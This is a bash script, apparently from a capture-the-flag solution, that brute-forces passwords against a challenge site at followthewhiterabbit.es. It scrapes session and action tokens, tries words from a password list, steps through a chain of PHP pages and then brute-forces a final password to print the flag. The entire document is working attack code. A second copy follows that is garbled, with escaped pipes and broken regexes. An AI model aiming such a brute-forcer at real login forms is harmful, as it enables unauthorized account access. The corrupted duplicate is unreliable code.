jirojo2/pwn_rabbits.sh

## pwn_rabbits.sh
#!/bin/bash

for word in $(cat passwordlist.lst)
do
 tokens=$(curl -c cookie.txt -b cookie.txt http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
 token1=$(echo $tokens | cut -d' ' -f1)
 token2=$(echo $tokens | cut -d' ' -f2)

 echo "attempting word $word"

 result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2&pass_try=$word&submit=" http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null)

 echo $result > latest.html

 if [ $(echo $result | grep 'second.php' | wc -l) -eq "1" ]; then
  first_pass=$word
  echo "The first password is: $word"

  tokens=$(echo $result | tr " " "\n" | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
  token1=$(echo $tokens | cut -d' ' -f1)
  token2=$(echo $tokens | cut -d' ' -f2)
  result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2" http://challenge.followthewhiterabbit.es:1234/second.php?action=$token2 2>/dev/null)

  tokens=$(echo $result | sed -E "s/.*action=(.*)\".*/\1/")
  result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/third.php?action=$tokens 2>/dev/null)

  tokens=$(echo $result | sed -E "s/.*action=(.*)\".*/\1/")
  result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/final.php?action=$tokens 2>/dev/null)

  tokens=$(echo $result | tr " " "\n" | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
  token1=$(echo $tokens | cut -d' ' -f1)
  token2=$(echo $tokens | cut -d' ' -f2)

  for word in $(cat passwordlist.lst)
  do
   echo "attempting word $word"

   result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2&pass_try=$word&submit=" http://challenge.followthewhiterabbit.es:1234/final.php 2>/dev/null)

   echo $result > latest.html

   if [ $(echo $result | grep 'Start over' | wc -l) -ne "1" ]; then
    echo "The final password is: $word"
    echo $result | grep flag
    exit
   fi

   tokens=$(curl -c cookie.txt -b cookie.txt http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
   token1=$(echo $tokens | cut -d' ' -f1)
   token2=$(echo $tokens | cut -d' ' -f2)
   result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2&pass_try=$first_pass&submit=" http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null)

   tokens=$(echo $result | tr " " "\n" | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
   token1=$(echo $tokens | cut -d' ' -f1)
   token2=$(echo $tokens | cut -d' ' -f2)
   result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2" http://challenge.followthewhiterabbit.es:1234/second.php?action=$token2 2>/dev/null)

   tokens=$(echo $result | sed -E "s/.*action=(.*)\".*/\1/")
   result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/third.php?action=$tokens 2>/dev/null)

   tokens=$(echo $result | sed -E "s/.*action=(.*)\".*/\1/")
   result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/final.php?action=$tokens 2>/dev/null)

   tokens=$(echo $result | tr " " "\n" | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
   token1=$(echo $tokens | cut -d' ' -f1)
   token2=$(echo $tokens | cut -d' ' -f2)
  done

  exit
 fi
done
	#!/bin/bash

	for word in $(cat passwordlist.lst)
	do
	tokens=$(curl -c cookie.txt -b cookie.txt http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null \| grep value= \| head -n2 \| sed -E "s/.value=(.)>/\1/")
	token1=$(echo $tokens \| cut -d' ' -f1)
	token2=$(echo $tokens \| cut -d' ' -f2)

	echo "attempting word $word"

	result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2&pass_try=$word&submit=" http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null)

	echo $result > latest.html

	if [ $(echo $result \| grep 'second.php' \| wc -l) -eq "1" ]; then
	first_pass=$word
	echo "The first password is: $word"

	tokens=$(echo $result \| tr " " "\n" \| grep value= \| head -n2 \| sed -E "s/.value=(.)>/\1/")
	token1=$(echo $tokens \| cut -d' ' -f1)
	token2=$(echo $tokens \| cut -d' ' -f2)
	result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2" http://challenge.followthewhiterabbit.es:1234/second.php?action=$token2 2>/dev/null)

	tokens=$(echo $result \| sed -E "s/.action=(.)\".*/\1/")
	result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/third.php?action=$tokens 2>/dev/null)

	tokens=$(echo $result \| sed -E "s/.action=(.)\".*/\1/")
	result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/final.php?action=$tokens 2>/dev/null)

	tokens=$(echo $result \| tr " " "\n" \| grep value= \| head -n2 \| sed -E "s/.value=(.)>/\1/")
	token1=$(echo $tokens \| cut -d' ' -f1)
	token2=$(echo $tokens \| cut -d' ' -f2)

	for word in $(cat passwordlist.lst)
	do
	echo "attempting word $word"

	result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2&pass_try=$word&submit=" http://challenge.followthewhiterabbit.es:1234/final.php 2>/dev/null)

	echo $result > latest.html

	if [ $(echo $result \| grep 'Start over' \| wc -l) -ne "1" ]; then
	echo "The final password is: $word"
	echo $result \| grep flag
	exit
	fi

	tokens=$(curl -c cookie.txt -b cookie.txt http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null \| grep value= \| head -n2 \| sed -E "s/.value=(.)>/\1/")
	token1=$(echo $tokens \| cut -d' ' -f1)
	token2=$(echo $tokens \| cut -d' ' -f2)
	result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2&pass_try=$first_pass&submit=" http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null)

	tokens=$(echo $result \| tr " " "\n" \| grep value= \| head -n2 \| sed -E "s/.value=(.)>/\1/")
	token1=$(echo $tokens \| cut -d' ' -f1)
	token2=$(echo $tokens \| cut -d' ' -f2)
	result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2" http://challenge.followthewhiterabbit.es:1234/second.php?action=$token2 2>/dev/null)

	tokens=$(echo $result \| sed -E "s/.action=(.)\".*/\1/")
	result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/third.php?action=$tokens 2>/dev/null)

	tokens=$(echo $result \| sed -E "s/.action=(.)\".*/\1/")
	result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/final.php?action=$tokens 2>/dev/null)

	tokens=$(echo $result \| tr " " "\n" \| grep value= \| head -n2 \| sed -E "s/.value=(.)>/\1/")
	token1=$(echo $tokens \| cut -d' ' -f1)
	token2=$(echo $tokens \| cut -d' ' -f2)
	done

	exit
	fi
	done